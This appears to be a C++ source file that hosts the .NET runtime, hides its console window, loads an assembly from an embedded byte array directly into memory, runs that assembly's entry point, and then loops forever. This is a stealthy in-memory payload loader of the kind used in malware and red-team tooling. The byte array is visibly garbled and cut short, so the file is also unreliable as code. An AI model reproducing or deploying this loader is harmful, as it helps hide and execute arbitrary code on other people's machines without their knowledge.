cl

1. #include "stdafx.h"
2. #include<metahost.h>
3. #include <metahost.h>
4. #include <iostream>
5. #pragma comment(lib, "MSCOREE.lib")
6. using namespace std;
7. #define RAW_ASSEMBLY_LENGTH 16896
8.  
9.  
10. unsigned char rawData[16896] = {
11.  
12. 0xAB, 0x01, 0x21, 0x01, 0x9D, 0x08, 0xF6, 0x01, 0x2E, 0x00, 0x13, 0x00,
13. x0E, 0x0E, 0x0E,
14. 0x08, 0x02, 0x0E, 0x02, 0x06, 0x20, 0x03, 0x1C, 0x0E, 0x0E, 0x0E, 0x03,
15. 0x20, 0x00, 0x1C, 0x11, 0x00, 0x08, 0x08, 0x10, 0x0E, 0x10, 0x0E, 0x08,
16. 0x1
17. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
18. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
19. };
20.  
21.  
22.  
23. int _tmain(int argc, _TCHAR* argv[])
24. {
25. ShowWindow(GetConsoleWindow(), SW_HIDE);
26. ICLRMetaHost* pMetaHost = NULL;
27.  
28. HRESULT hr;
29.  
30. /* Get ICLRMetaHost instance */
31.  
32. hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (VOID**)&pMetaHost);
33.  
34. if (FAILED(hr))
35. {
36. printf("[!] CLRCreateInstance(...) failed\n");
37.  
38. getchar();
39.  
40. return -1;
41. }
42.  
43. printf("[+] CLRCreateInstance(...) succeeded\n");
44.  
45. ICLRRuntimeInfo* pRuntimeInfo = NULL;
46.  
47. /* Get ICLRRuntimeInfo instance */
48.  
49. hr = pMetaHost->GetRuntime(L"v2.0.50727", IID_ICLRRuntimeInfo, (VOID**)&pRuntimeInfo);
50.  
51. if (FAILED(hr))
52. {
53. printf("[!] pMetaHost->GetRuntime(...) failed\n");
54.  
55. getchar();
56.  
57. return -1;
58. }
59.  
60. printf("[+] pMetaHost->GetRuntime(...) succeeded\n");
61.  
62. BOOL bLoadable;
63.  
64. /* Check if the specified runtime can be loaded */
65.  
66. hr = pRuntimeInfo->IsLoadable(&bLoadable);
67.  
68. if (FAILED(hr) || !bLoadable)
69. {
70. printf("[!] pRuntimeInfo->IsLoadable(...) failed\n");
71.  
72. getchar();
73.  
74. return -1;
75. }
76.  
77. printf("[+] pRuntimeInfo->IsLoadable(...) succeeded\n");
78.  
79. ICorRuntimeHost* pRuntimeHost = NULL;
80.  
81. /* Get ICorRuntimeHost instance */
82.  
83. hr = pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_ICorRuntimeHost, (VOID**)&pRuntimeHost);
84.  
85. if (FAILED(hr))
86. {
87. printf("[!] pRuntimeInfo->GetInterface(...) failed\n");
88.  
89. getchar();
90.  
91. return -1;
92. }
93.  
94. printf("[+] pRuntimeInfo->GetInterface(...) succeeded\n");
95.  
96. /* Start the CLR */
97.  
98. hr = pRuntimeHost->Start();
99.  
100. if (FAILED(hr))
101. {
102. printf("[!] pRuntimeHost->Start() failed\n");
103.  
104. getchar();
105.  
106. return -1;
107. }
108.  
109. printf("[+] pRuntimeHost->Start() succeeded\n");
110.  
111. IUnknownPtr pAppDomainThunk = NULL;
112.  
113. hr = pRuntimeHost->GetDefaultDomain(&pAppDomainThunk);
114.  
115. if (FAILED(hr))
116. {
117. printf("[!] pRuntimeHost->GetDefaultDomain(...) failed\n");
118.  
119. getchar();
120.  
121. return -1;
122. }
123.  
124. printf("[+] pRuntimeHost->GetDefaultDomain(...) succeeded\n");
125.  
126. _AppDomainPtr pDefaultAppDomain = NULL;
127.  
128. /* Equivalent of System.AppDomain.CurrentDomain in C# */
129.  
130. hr = pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (VOID**)&pDefaultAppDomain);
131.  
132. if (FAILED(hr))
133. {
134. printf("[!] pAppDomainThunk->QueryInterface(...) failed\n");
135.  
136. getchar();
137.  
138. return -1;
139. }
140.  
141. printf("[+] pAppDomainThunk->QueryInterface(...) succeeded\n");
142.  
143. _AssemblyPtr pAssembly = NULL;
144.  
145. SAFEARRAYBOUND rgsabound[1];
146.  
147. rgsabound[0].cElements = RAW_ASSEMBLY_LENGTH;
148.  
149. rgsabound[0].lLbound = 0;
150.  
151. SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);
152.  
153. void* pvData = NULL;
154.  
155. hr = SafeArrayAccessData(pSafeArray, &pvData);
156.  
157. if (FAILED(hr))
158. {
159. printf("[!] SafeArrayAccessData(...) failed\n");
160.  
161. getchar();
162.  
163. return -1;
164. }
165.  
166. printf("[+] SafeArrayAccessData(...) succeeded\n");
167.  
168. memcpy(pvData, rawData, RAW_ASSEMBLY_LENGTH);
169.  
170. hr = SafeArrayUnaccessData(pSafeArray);
171.  
172. if (FAILED(hr))
173. {
174. printf("[!] SafeArrayUnaccessData(...) failed\n");
175.  
176. getchar();
177.  
178. return -1;
179. }
180.  
181. printf("[+] SafeArrayUnaccessData(...) succeeded\n");
182.  
183. /* Equivalent of System.AppDomain.CurrentDomain.Load(byte[] rawAssembly) */
184.  
185. hr = pDefaultAppDomain->Load_3(pSafeArray, &pAssembly);
186.  
187. if (FAILED(hr))
188. {
189. printf("[!] pDefaultAppDomain->Load_3(...) failed\n");
190.  
191. getchar();
192.  
193. return -1;
194. }
195.  
196. printf("[+] pDefaultAppDomain->Load_3(...) succeeded\n");
197.  
198. _MethodInfoPtr pMethodInfo = NULL;
199.  
200. /* Assembly.EntryPoint Property */
201.  
202. hr = pAssembly->get_EntryPoint(&pMethodInfo);
203.  
204. if (FAILED(hr))
205. {
206. printf("[!] pAssembly->get_EntryPoint(...) failed\n");
207.  
208. getchar();
209.  
210. return -1;
211. }
212.  
213. printf("[+] pAssembly->get_EntryPoint(...) succeeded\n");
214.  
215. VARIANT retVal;
216. ZeroMemory(&retVal, sizeof(VARIANT));
217.  
218. VARIANT obj;
219. ZeroMemory(&obj, sizeof(VARIANT));
220. obj.vt = VT_NULL;
221.  
222. //TODO! Change cElement to the number of Main arguments
223. SAFEARRAY *psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0);
224.  
225. /* EntryPoint.Invoke(null, new object[0]) */
226.  
227. hr = pMethodInfo->Invoke_3(obj, psaStaticMethodArgs, &retVal);
228.  
229. if (FAILED(hr))
230. {
231. printf("[!] pMethodInfo->Invoke_3(...) failed, hr = %X\n", hr);
232.  
233. getchar();
234.  
235. return -1;
236. }
237.  
238. printf("[+] pMethodInfo->Invoke_3(...) succeeded\n");
239.  
240. while(1==1){}
241.  
242. return 0;
243. }